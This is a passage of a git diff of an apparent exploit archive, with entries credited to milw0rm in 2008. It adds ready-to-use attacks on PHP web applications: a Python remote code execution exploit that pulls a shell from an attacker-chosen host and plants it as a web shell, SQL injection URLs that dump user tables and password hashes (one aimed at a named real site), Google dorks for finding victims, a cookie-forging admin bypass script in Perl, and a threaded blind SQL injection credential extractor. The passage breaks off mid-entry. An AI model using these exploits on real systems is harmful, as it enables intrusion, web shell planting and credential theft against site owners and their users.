+# # +#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Our Site : Http://IRCRASH.COM # +#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # +##################################################################################### +# # +#Site : http://minb.sf.net # +# # +#Download : http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2 # +# # +#DORK : Powered by minb # +# # +##################################################################################### +# [Note] # +# # +#All php file in this cms have this bug ;) # +# # +##################################################################################### +# Site : Http://IRCRASH.COM # +###################################### TNX GOD ###################################### +import sys,urllib +if len(sys.argv)<3 : + print "minb Remote code Execution Exploit" + print "Powered by : R3d.W0rm" 
+ print "www.IrCrash.com" + print "Usage : " + sys.argv[0] + " http://Target/path http://evil/shell.txt" + print "Ex. " + sys.argv[0] + " http://site.com/minb http://r3d.a20.ir/r.txt" + exit() +if 'http://' not in sys.argv[1] : + sys.argv[1]='http://' + sys.argv[1] +if 'http://' not in sys.argv[2] : + sys.argv[2]='http://' + sys.argv[2] +fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm' +data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=";$s=fopen(\'' + sys.argv[2] + '\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'}) +urllib.urlopen(sys.argv[1] + fp,data) +urllib.urlopen(sys.argv[1] + fp) +test=urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read() +if 'Not Found' not in test : + print "Shell Uploaded ." + print sys.argv[1] + '/upload/pictures/r3d.w0rm.php' +exit() + +# milw0rm.com [2008-09-11] diff --git a/platforms/php/webapps/6433.txt b/platforms/php/webapps/6433.txt index c3c95ae02..45cb64da8 100755 --- a/platforms/php/webapps/6433.txt +++ b/platforms/php/webapps/6433.txt 
@@ -1,39 +1,39 @@ -############################################################################################################ -[+] Autodealers CMS AutOnline (id) SQL Injection Vulnerability -[+] Discovered By ZoRLu -[+] home: z0rlu.blogspot.com & yildirimordulari.org & r00tsecurity.org & darkc0de.org -[+] Greetz: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs -[+] trt-turk@hotmail.co & zorlu@w.cn -############################################################################################################ -[+] -[+] -[+] -[+] - - exploit: -http://localhost/script_path/index.php?page=detail&id=[SQL] - -[+] -[+] -[+] -[+] - - [SQL]= -ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/* - -[+] -[+] -[+] -[+] -[+] - - demo: -http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/* - -[+] -[+] -[+] -[+] -############################################################################################################ - -# milw0rm.com [2008-09-11] +############################################################################################################ +[+] Autodealers CMS AutOnline (id) SQL Injection Vulnerability +[+] Discovered By ZoRLu +[+] home: z0rlu.blogspot.com & yildirimordulari.org & r00tsecurity.org & darkc0de.org +[+] Greetz: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs +[+] trt-turk@hotmail.co & zorlu@w.cn +############################################################################################################ +[+] +[+] +[+] +[+] + + exploit: +http://localhost/script_path/index.php?page=detail&id=[SQL] + +[+] +[+] +[+] +[+] + + [SQL]= 
+ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/* + +[+] +[+] +[+] +[+] +[+] + + demo: +http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/* + +[+] +[+] +[+] +[+] +############################################################################################################ + +# milw0rm.com [2008-09-11] diff --git a/platforms/php/webapps/6435.txt b/platforms/php/webapps/6435.txt index 2a9131772..cf376c058 100755 --- a/platforms/php/webapps/6435.txt +++ b/platforms/php/webapps/6435.txt 
@@ -1,39 +1,39 @@ - ################################################################################### - # # - # ...::::: Sports Clubs Web Panel 0.0.1 SQL Injection Vulnerability ::::.... # - ################################################################################### - -Virangar Security Team - -www.virangar.net - - --------- -Discoverd By :virangar security team(Zahra:zh_virangar) - -special tnx :my master hadihadi - -tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007 - -& all virangar members & all hackerz -------- -vuln codes in /include/draw-view.php: - -line 22: if(isset($_GET['id']) || isset($_POST['id'])) { -lin 23: $teamid = $_GET['id'].$_POST['id']; -... -... -line 43: $drawTeam = mysql_query("SELECT * FROM draw WHERE dteam = '$teamid' ORDER BY ddate"); ----------- -vuln codes in /include/draw-edit.php - -line 1: $id = $_GET['id']; -line 2: $editDraw = mysql_query("SELECT * FROM draw WHERE did='$id' LIMIT 1"); --------- -exploit: -http://site.com/[patch]/?p=draw-view&id='/**/union/**/select/**/1,2,3,version(),5,6,User,password%20,9/**/from/**/mysql.user/* -http://site.com/[patch]/?p=draw-edit&id='/**/union/**/select/**/1,2,3,4,5,version(),7,8,9/* -------------- -young iranian h4ck3rz - -# milw0rm.com [2008-09-11] + ################################################################################### + # # + # ...::::: Sports Clubs Web Panel 0.0.1 SQL Injection Vulnerability ::::.... # + ################################################################################### + +Virangar Security Team + +www.virangar.net + + +-------- +Discoverd By :virangar security team(Zahra:zh_virangar) + +special tnx :my master hadihadi + +tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007 + +& all virangar members & all hackerz +------- +vuln codes in /include/draw-view.php: + +line 22: if(isset($_GET['id']) || isset($_POST['id'])) { +lin 23: $teamid = $_GET['id'].$_POST['id']; +... +... 
+line 43: $drawTeam = mysql_query("SELECT * FROM draw WHERE dteam = '$teamid' ORDER BY ddate"); +---------- +vuln codes in /include/draw-edit.php + +line 1: $id = $_GET['id']; +line 2: $editDraw = mysql_query("SELECT * FROM draw WHERE did='$id' LIMIT 1"); +-------- +exploit: +http://site.com/[patch]/?p=draw-view&id='/**/union/**/select/**/1,2,3,version(),5,6,User,password%20,9/**/from/**/mysql.user/* +http://site.com/[patch]/?p=draw-edit&id='/**/union/**/select/**/1,2,3,4,5,version(),7,8,9/* +------------- +young iranian h4ck3rz + +# milw0rm.com [2008-09-11] diff --git a/platforms/php/webapps/6436.txt b/platforms/php/webapps/6436.txt index efbcc123b..d3d4ff30a 100755 --- a/platforms/php/webapps/6436.txt +++ b/platforms/php/webapps/6436.txt 
@@ -1,16 +1,16 @@
-----------------------------------------------------------------
-Script : PhpWebGallery 1.3.4
-Type : Vulnerabilities (blind sql injection)
-Author : Stack
-Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
-----------------------------------------------------------------
-Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
-----------------------------------------------------------------
-waiting the demo exploit
-----------------------------------------------------------------
-Exploit :
-http://site.il/phpwebgallery/picture.php?cat=[Real id]&image_id=[Real id]+and+substring(@@version,1,1)=5
-Example :
-http://site.il/phpwebgallery/picture.php?cat=3&image_id=76+and+substring(@@version,1,1)=5
-
-# milw0rm.com [2008-09-11]
+----------------------------------------------------------------
+Script : PhpWebGallery 1.3.4
+Type : Vulnerabilities (blind sql injection)
+Author : Stack
+Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
+----------------------------------------------------------------
+Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
+----------------------------------------------------------------
+waiting the demo exploit
+----------------------------------------------------------------
+Exploit :
+http://site.il/phpwebgallery/picture.php?cat=[Real id]&image_id=[Real id]+and+substring(@@version,1,1)=5
+Example :
+http://site.il/phpwebgallery/picture.php?cat=3&image_id=76+and+substring(@@version,1,1)=5
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6437.txt b/platforms/php/webapps/6437.txt
index 80e13b7fa..a0e7fbee4 100755
--- a/platforms/php/webapps/6437.txt
+++ b/platforms/php/webapps/6437.txt
@@ -1,38 +1,38 @@ -#---------------------------------------------------------------- -# -#Script : Ezphotogallery 2.1 -# -#Type : Vulnerabilities ( Add Admin user/Remove user) -# -#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid=" -# -#---------------------------------------------------------------- -# -#Discovered by : Stack -# -#---------------------------------------------------------------- -# -#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip -# -#---------------------------------------------------------------- - -Exploit : - http://site.il/useradmin.php -how to use exploit -in Add user select ----------------------------------------- -Simple example by Stack user :d :d ----------------------------------------- - Add user -Name: Stack -Password: passstack -E-mail: Stack@hotmail.fr -Private: yes or no -Administrator: yes -now stack username is a administrator user ----------------------------------------- - Remove user -User: chouse the user and click remove ----------------------------------------- - -# milw0rm.com [2008-09-11] +#---------------------------------------------------------------- +# +#Script : Ezphotogallery 2.1 +# +#Type : Vulnerabilities ( Add Admin user/Remove user) +# +#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid=" +# +#---------------------------------------------------------------- +# +#Discovered by : Stack +# +#---------------------------------------------------------------- +# +#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip +# +#---------------------------------------------------------------- + +Exploit : + http://site.il/useradmin.php +how to use exploit +in Add user select +---------------------------------------- +Simple example by Stack user :d :d +---------------------------------------- + Add user +Name: Stack +Password: passstack +E-mail: Stack@hotmail.fr +Private: yes 
or no +Administrator: yes +now stack username is a administrator user +---------------------------------------- + Remove user +User: chouse the user and click remove +---------------------------------------- + +# milw0rm.com [2008-09-11] diff --git a/platforms/php/webapps/6438.pl b/platforms/php/webapps/6438.pl index e3afa92ac..3ed19198e 100755 --- a/platforms/php/webapps/6438.pl +++ b/platforms/php/webapps/6438.pl 
@@ -1,135 +1,135 @@ -#!/usr/bin/perl - -use LWP::UserAgent; -use HTTP::Request; - -#+-------------------------------------------------------------------------------------------------+-# -#+ Yourownbux v4.0 ------------------------------------------------------------+--+ -#+ Cookie Modification Exploit -----------------------------------------------------------------++ -#+ Discovered By: Tec-n0x | 04/9/2008 --------------------------------------------------------++ -# -#+ Dropsec.com -# -#+ Modify The Line 39, Adding More User's that can be the admin username------------+ -#+ -# + Gr33tz: Celciuz, OzX, N.O.X, MurdeR, Syst3m-c0d3r && All Friends --++ -#+-------------------------------------------------------------+----------------------------------------# - - - -system("clear"); - -print " -# Yourownbux v4.0 Cookie Modification Exploit\n# Discovered By: Tec-n0x\n\n# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com -\n\n"; -print "Target [ Example: www.sitedemo.com ] :\n> "; -$target = ; -chop($target); - -if($target =~ m/www\.(.*)\.(.*)/) { - -$other = $1; -check1($target); - -} else { -print "\nInvalid Target."; -exit(); -} - -sub explote { - -@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other"); -# Add Posible Users. 
- -$check = shift; - -foreach $user (@tryusers) { - -$pass = "Tec-n0x"; - -print "\n\tTrying > $user\n"; - - $browser = LWP::UserAgent->new(); - $browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"); - $browser->default_header("Cookie" => "usNick=$user; usPass=$pass"); - $get = HTTP::Request->new(GET => $check); - $resp = $browser->request($get); - $content = $resp->content(); - -@code = split("\n",$content); - - foreach $checka (@code) { - - if($checka =~ m/Emails|Served|Workload|Overview/) { - -system("clear"); - -print "Succesfull EXPLOTED ...!!\n\nValid Username: $user\n\nGo to: $check\n\n And Put this on your browser:"; - -$vd = "javascript\:document\.cookie = \"usNick=$user\; path=\/\"\;"; -$vda = "javascript\:document\.cookie = \"usPass=Dropsec\.com\; path=\/\"\;"; - -print " - -+------------------------------------+ -+ $vd\n+ $vda -+------------------------------------+ -"; - - -$yes = 1; - -exit(); - -} -} -} - -if($yes != 1) { - -print "\n\n\nExploit Failed"; - -exit(); - -} - -} -sub check1 { - -$target = shift; - -$check = "http\:\/\/$target\/admin\/index\.php"; - - $browser = LWP::UserAgent->new(); - $browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"); - $get = HTTP::Request->new(GET => $check); - $resp = $browser->request($get); - $content = $resp->content(); - -@code = split("\n",$content); - - foreach $checka (@code) { - - if($checka =~ m/You must login as administrator to access this page/) { - -print "Check 1 [ OK ]\n"; - -$success = 1; - -explote($check); - -} - -} - -if($sucess != 1) { - -print "Failed"; - -exit(); - -} - -} - -# milw0rm.com [2008-09-11] +#!/usr/bin/perl + +use LWP::UserAgent; +use HTTP::Request; + +#+-------------------------------------------------------------------------------------------------+-# +#+ Yourownbux v4.0 ------------------------------------------------------------+--+ +#+ Cookie Modification 
Exploit -----------------------------------------------------------------++ +#+ Discovered By: Tec-n0x | 04/9/2008 --------------------------------------------------------++ +# +#+ Dropsec.com +# +#+ Modify The Line 39, Adding More User's that can be the admin username------------+ +#+ +# + Gr33tz: Celciuz, OzX, N.O.X, MurdeR, Syst3m-c0d3r && All Friends --++ +#+-------------------------------------------------------------+----------------------------------------# + + + +system("clear"); + +print " +# Yourownbux v4.0 Cookie Modification Exploit\n# Discovered By: Tec-n0x\n\n# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com +\n\n"; +print "Target [ Example: www.sitedemo.com ] :\n> "; +$target = ; +chop($target); + +if($target =~ m/www\.(.*)\.(.*)/) { + +$other = $1; +check1($target); + +} else { +print "\nInvalid Target."; +exit(); +} + +sub explote { + +@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other"); +# Add Posible Users. + +$check = shift; + +foreach $user (@tryusers) { + +$pass = "Tec-n0x"; + +print "\n\tTrying > $user\n"; + + $browser = LWP::UserAgent->new(); + $browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"); + $browser->default_header("Cookie" => "usNick=$user; usPass=$pass"); + $get = HTTP::Request->new(GET => $check); + $resp = $browser->request($get); + $content = $resp->content(); + +@code = split("\n",$content); + + foreach $checka (@code) { + + if($checka =~ m/Emails|Served|Workload|Overview/) { + +system("clear"); + +print "Succesfull EXPLOTED ...!!\n\nValid Username: $user\n\nGo to: $check\n\n And Put this on your browser:"; + +$vd = "javascript\:document\.cookie = \"usNick=$user\; path=\/\"\;"; +$vda = "javascript\:document\.cookie = \"usPass=Dropsec\.com\; path=\/\"\;"; + +print " + ++------------------------------------+ ++ $vd\n+ $vda ++------------------------------------+ +"; + + +$yes = 1; + +exit(); + +} +} +} + +if($yes != 1) { + 
+print "\n\n\nExploit Failed"; + +exit(); + +} + +} +sub check1 { + +$target = shift; + +$check = "http\:\/\/$target\/admin\/index\.php"; + + $browser = LWP::UserAgent->new(); + $browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"); + $get = HTTP::Request->new(GET => $check); + $resp = $browser->request($get); + $content = $resp->content(); + +@code = split("\n",$content); + + foreach $checka (@code) { + + if($checka =~ m/You must login as administrator to access this page/) { + +print "Check 1 [ OK ]\n"; + +$success = 1; + +explote($check); + +} + +} + +if($sucess != 1) { + +print "Failed"; + +exit(); + +} + +} + +# milw0rm.com [2008-09-11] diff --git a/platforms/php/webapps/6439.txt b/platforms/php/webapps/6439.txt index de1864083..c9235a9ac 100755 --- a/platforms/php/webapps/6439.txt +++ b/platforms/php/webapps/6439.txt 
@@ -1,18 +1,18 @@ ---==+============================================================================+==-- ---==+ Sports Clubs Web Panel 0.0.1 Remote File upload +==-- ---==+============================================================================+==-- - - [*] Discovered By: Stack - [+] Discovered On: 11 Sep 2008 - [+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370 - -hello guys in this script admin need make a directory name grounds in public directory of script for the 'Add Ground' functions work -so then its will be useful for us use this exploit :d -Exploit : -http://localhost/sport/?p=grounds-add -after write any nae in Ground Name select -upload you php script and go to -http://localhost/sport/grounds/ -you can see your php file uploaded - -# milw0rm.com [2008-09-12] +--==+============================================================================+==-- +--==+ Sports Clubs Web Panel 0.0.1 Remote File upload +==-- +--==+============================================================================+==-- + + [*] Discovered By: Stack + [+] Discovered On: 11 Sep 2008 + [+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370 + +hello guys in this script admin need make a directory name grounds in public directory of script for the 'Add Ground' functions work +so then its will be useful for us use this exploit :d +Exploit : +http://localhost/sport/?p=grounds-add +after write any nae in Ground Name select +upload you php script and go to +http://localhost/sport/grounds/ +you can see your php file uploaded + +# milw0rm.com [2008-09-12] diff --git a/platforms/php/webapps/6440.pl b/platforms/php/webapps/6440.pl index 6130bb2af..ee70aa58c 100755 --- a/platforms/php/webapps/6440.pl +++ b/platforms/php/webapps/6440.pl 
@@ -1,215 +1,215 @@ -#!/usr/bin/perl -W - -# -# PhpWebGallery 1.3.4 Blind SQL Injection Exploit -# Download: http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2 -# File affected: picture.php -# -# exploit written by ka0x -# D.O.M Labs - Security Researchers -# - www.domlabs.org - -# -# ka0x@domlabs:~/codes$ ./phpwebgallery.pl -u "http://localhost/gallery/picture.php?cat=1&image_id=1" -# [i] Getting default: -T 30 -# [i] Getting default: -l 200 -# [i] Getting default: -t 15 -# 21 118 v -# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 18. -# [i] USER / PASSWORD: -# admin / php_gallery_ -# -# - - -my $MAX_FIELD_LENGTH = 200 ; -my $EXIT_IF_NO_CHAR = 1 ; -my $DEFAULT_THREADS = 15 ; -my $DEFAULT_THREADS_TIMEOUT = 30 ; -my @ascii = ( 32 .. 123 ) ; -my $DEFAULT_THREADS_TIME = 1 ; -my $pattern = 'Powered'; - - -use LWP::UserAgent ; - -sub _HELP_AND_EXIT -{ - die " - - ./$0 -u - - Options: - -u Ex: http://localhost/picture.php?cat=1&image_id=1 - - Other: - -t <#> Threads, default '$DEFAULT_THREADS'. - -l <#> Maximum table name length '$MAX_FIELD_LENGTH'. - -T <#> Timeout. - -h Help (also with --help). - - Example: - - ./$0 -u \"http://localhost/gallery/picture.php?cat=1&image_id=1\" - -" ; -} - - -my ($p, $w) = ({ @ARGV }, { }) ; - -map { - &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ; -} keys %$p ; - -map { - die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ; -} qw/-u/ ; - -$p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ; -$p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ; -$p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ; - -map { - warn "[i] Getting default: $_ $w->{ $_ }\n" ; -} sort keys %$w ; - -( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? 
Isn't vulnerable ?\n" ; - - - -sub _START_WORK -{ - my $p = shift ; - my $position = 1 ; - - pipe(R, W) ; - pipe(Rs, Ws) ; - autoflush STDOUT 1 ; - - my $sql_message = '' ; - my $msg = '' ; - my @pid ; - - while( $position <= $p->{'-l'} ) - { - my $cf ; - unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; } - push(@pid, $cf) ; - - my $count = 0 ; - my $can_exit ; - my $char_printed ; - - while() - { - chomp ; - push(@pid, (split(/:/))[1] ) if /^pid/ ; - - my ($res, $pos, $ascii) = ( split(/ /, $_) ) ; - $count++ if $pos == $position ; - - print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ; - - if( $res eq 'yes' and $pos == $position ){ - $char_printed = $can_exit = 1 ; - print Ws "STOP $position\n" ; - $sql_message .= chr( $ascii ) ; - } - - last if ( $can_exit or $count == @ascii ); - } - - map { - waitpid($_, 0) - } @pid ; - - unless( $char_printed ) - { - if( $EXIT_IF_NO_CHAR ) - { - warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n" ; - last ; - } - } - $position++ ; - } - - print "[i] USER / PASSWORD:\n$sql_message\n" ; - -} - -sub _CHECKING -{ - my ($p, $position) = @_ ; - my $counter = 0 ; - - foreach my $ascii ( @ascii ) - { - $counter++ ; - - if( $counter % $p->{'-t'} == 0 ) - { - my $stop_position ; - eval - { - $SIG{'ALRM'} = sub { - die "non_stop\n" - } ; - - alarm $DEFAULT_THREADS_TIME ; - my $line = ; - $stop_position = (split( / /, $line))[1] ; - alarm 0 ; - } ; - - if( ($stop_position) and $stop_position == $position ){ - print "\nnext position\n" ; - exit(0) ; - } - } - - unless(my $pid = fork ) - { - print Ws "pid:$pid\n" or die ; - - my $url = $p->{'-u'} . - ' AND - ascii(substring((SELECT CONCAT(username,0x202f20,password) - FROM phpwebgallery_users - LIMIT 0,1),' . $position . ',1))='. $ascii ; - - my $ua = LWP::UserAgent->new ; - $ua->timeout( $p->{'-T'} ) ; - - my $content ; - while( 1 ) - { - last if $content = $ua->get( $url )->content ; - } - - ( $content =~ /$pattern/ ) ? 
print W "yes $position $ascii\n" : print W "no $position $ascii\n" ; - - exit( 0 ) ; - } - - } -} - -sub _IS_VULN -{ - my $p = shift ; - my $ua = LWP::UserAgent->new ; - $ua->timeout( $p->{'-T'} ) ; - - my ( $one, $two ) = ( - $ua->get( $p->{'-u'}." AND 1=1")->content , - $ua->get( $p->{'-u'}." AND 1=2")->content , - ) ; - - return ($one =~ /$pattern/ and $two !~ /$pattern/) ? 1 : undef ; - -} - -__END__ - -# milw0rm.com [2008-09-12] +#!/usr/bin/perl -W + +# +# PhpWebGallery 1.3.4 Blind SQL Injection Exploit +# Download: http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2 +# File affected: picture.php +# +# exploit written by ka0x +# D.O.M Labs - Security Researchers +# - www.domlabs.org - +# +# ka0x@domlabs:~/codes$ ./phpwebgallery.pl -u "http://localhost/gallery/picture.php?cat=1&image_id=1" +# [i] Getting default: -T 30 +# [i] Getting default: -l 200 +# [i] Getting default: -t 15 +# 21 118 v +# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 18. +# [i] USER / PASSWORD: +# admin / php_gallery_ +# +# + + +my $MAX_FIELD_LENGTH = 200 ; +my $EXIT_IF_NO_CHAR = 1 ; +my $DEFAULT_THREADS = 15 ; +my $DEFAULT_THREADS_TIMEOUT = 30 ; +my @ascii = ( 32 .. 123 ) ; +my $DEFAULT_THREADS_TIME = 1 ; +my $pattern = 'Powered'; + + +use LWP::UserAgent ; + +sub _HELP_AND_EXIT +{ + die " + + ./$0 -u + + Options: + -u Ex: http://localhost/picture.php?cat=1&image_id=1 + + Other: + -t <#> Threads, default '$DEFAULT_THREADS'. + -l <#> Maximum table name length '$MAX_FIELD_LENGTH'. + -T <#> Timeout. + -h Help (also with --help). + + Example: + + ./$0 -u \"http://localhost/gallery/picture.php?cat=1&image_id=1\" + +" ; +} + + +my ($p, $w) = ({ @ARGV }, { }) ; + +map { + &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ; +} keys %$p ; + +map { + die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ; +} qw/-u/ ; + +$p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? 
$p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ; +$p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ; +$p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ; + +map { + warn "[i] Getting default: $_ $w->{ $_ }\n" ; +} sort keys %$w ; + +( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ; + + + +sub _START_WORK +{ + my $p = shift ; + my $position = 1 ; + + pipe(R, W) ; + pipe(Rs, Ws) ; + autoflush STDOUT 1 ; + + my $sql_message = '' ; + my $msg = '' ; + my @pid ; + + while( $position <= $p->{'-l'} ) + { + my $cf ; + unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; } + push(@pid, $cf) ; + + my $count = 0 ; + my $can_exit ; + my $char_printed ; + + while() + { + chomp ; + push(@pid, (split(/:/))[1] ) if /^pid/ ; + + my ($res, $pos, $ascii) = ( split(/ /, $_) ) ; + $count++ if $pos == $position ; + + print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ; + + if( $res eq 'yes' and $pos == $position ){ + $char_printed = $can_exit = 1 ; + print Ws "STOP $position\n" ; + $sql_message .= chr( $ascii ) ; + } + + last if ( $can_exit or $count == @ascii ); + } + + map { + waitpid($_, 0) + } @pid ; + + unless( $char_printed ) + { + if( $EXIT_IF_NO_CHAR ) + { + warn "\n[!] 
\$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n" ; + last ; + } + } + $position++ ; + } + + print "[i] USER / PASSWORD:\n$sql_message\n" ; + +} + +sub _CHECKING +{ + my ($p, $position) = @_ ; + my $counter = 0 ; + + foreach my $ascii ( @ascii ) + { + $counter++ ; + + if( $counter % $p->{'-t'} == 0 ) + { + my $stop_position ; + eval + { + $SIG{'ALRM'} = sub { + die "non_stop\n" + } ; + + alarm $DEFAULT_THREADS_TIME ; + my $line = ; + $stop_position = (split( / /, $line))[1] ; + alarm 0 ; + } ; + + if( ($stop_position) and $stop_position == $position ){ + print "\nnext position\n" ; + exit(0) ; + } + } + + unless(my $pid = fork ) + { + print Ws "pid:$pid\n" or die ; + + my $url = $p->{'-u'} . + ' AND + ascii(substring((SELECT CONCAT(username,0x202f20,password) + FROM phpwebgallery_users + LIMIT 0,1),' . $position . ',1))='. $ascii ; + + my $ua = LWP::UserAgent->new ; + $ua->timeout( $p->{'-T'} ) ; + + my $content ; + while( 1 ) + { + last if $content = $ua->get( $url )->content ; + } + + ( $content =~ /$pattern/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ; + + exit( 0 ) ; + } + + } +} + +sub _IS_VULN +{ + my $p = shift ; + my $ua = LWP::UserAgent->new ; + $ua->timeout( $p->{'-T'} ) ; + + my ( $one, $two ) = ( + $ua->get( $p->{'-u'}." AND 1=1")->content , + $ua->get( $p->{'-u'}." AND 1=2")->content , + ) ; + + return ($one =~ /$pattern/ and $two !~ /$pattern/) ? 1 : undef ; + +} + +__END__ + +# milw0rm.com [2008-09-12] diff --git a/platforms/php/webapps/6442.txt b/platforms/php/webapps/6442.txt index 5da12c271..be6713250 100755 --- a/platforms/php/webapps/6442.txt +++ b/platforms/php/webapps/6442.txt 
@@ -1,34 +1,34 @@ -#===================================================================================================== -#Powie's PHP Forum <= v1.30 (showprofil) Remote SQL Injection Exploit -#===================================================================================================== -# -#Critical Level : Dangerous -# -#Venedor site : http://www.powie.de -# -#Version : v1.30 -# -#===================================================================================================== -# -#DORK : "pForum 1.30" -# -# -#Exploit : -#-------------------------------- -# -#FOR USER: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,username)+FROM+pfuser+limit+1,1-- -#FOR PASS: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,pwd)+FROM+pfuser+limit+1,1-- -#FOR MAIL: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,emai)+FROM+pfuser+limit+1,1-- -# -#===================================================================================================== -#Discoverd By : -tmh- -# -#Contact : tmh[at]sys-flaw.com -# -#Greetz To : n00bor , Five-Three-Nine , J0hn.X3r , electron1x , meckl, Floo , -Patrick_B , -# Loader007 , bizzit , Sys-Flaw , Codesoft , Free-Hack abcdef , -# -# -#===================================================================================================== - -# milw0rm.com [2008-09-12] +#===================================================================================================== +#Powie's PHP Forum <= v1.30 (showprofil) Remote SQL Injection Exploit +#===================================================================================================== +# +#Critical Level : Dangerous +# +#Venedor site : http://www.powie.de +# +#Version : v1.30 +# +#===================================================================================================== +# +#DORK : "pForum 1.30" +# +# +#Exploit : +#-------------------------------- +# +#FOR USER: 
